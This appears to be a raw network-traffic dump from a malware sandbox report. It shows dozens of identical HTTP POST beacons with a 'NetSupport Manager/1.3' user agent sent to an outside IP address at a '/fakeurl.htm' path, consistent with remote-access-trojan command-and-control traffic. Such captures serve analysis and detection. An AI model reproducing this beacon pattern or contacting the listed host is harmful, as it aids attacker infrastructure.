                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:54.085897923 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:54.185713053 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:54.286675930 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:54.386681080 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:54.487632036 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:54.587599039 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:54.687813044 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:54.788606882 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:54.889780045 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:54.989667892 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:55.090698957 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:55.190906048 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:55.290976048 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:55.391724110 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:55.492711067 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:55.593615055 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:55.694638968 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:55.795609951 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:55.895678997 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:55.996637106 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:56.096662998 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:56.197681904 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:56.297729015 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:56.398612976 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:56.499178886 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:56.598592043 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:56.698617935 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:56.801919937 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:56.901668072 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:57.001915932 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:57.102864027 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:57.203628063 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:57.303930998 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:57.404623985 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:57.504605055 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:57.604671955 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:57.705634117 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:57.913791895 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:58.013880968 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:58.114592075 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:58.215606928 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:58.315859079 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:58.416768074 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:58.517640114 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:58.617610931 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:58.718645096 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:58.819659948 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:58.919620037 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:59.019680977 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:59.134553909 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:59.235687017 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:59.335609913 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:59.436634064 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:59.536583900 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:59.637653112 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:59.738563061 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:59.838622093 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:59.938623905 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:37:00.039609909 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:37:00.154086113 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:37:00.254749060 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:37:00.354631901 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:37:00.455661058 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:37:00.555548906 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:37:00.655601025 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:37:00.756074905 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:37:00.856587887 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:37:00.957612038 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:37:01.057837009 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:37:01.158580065 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:37:01.259902954 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
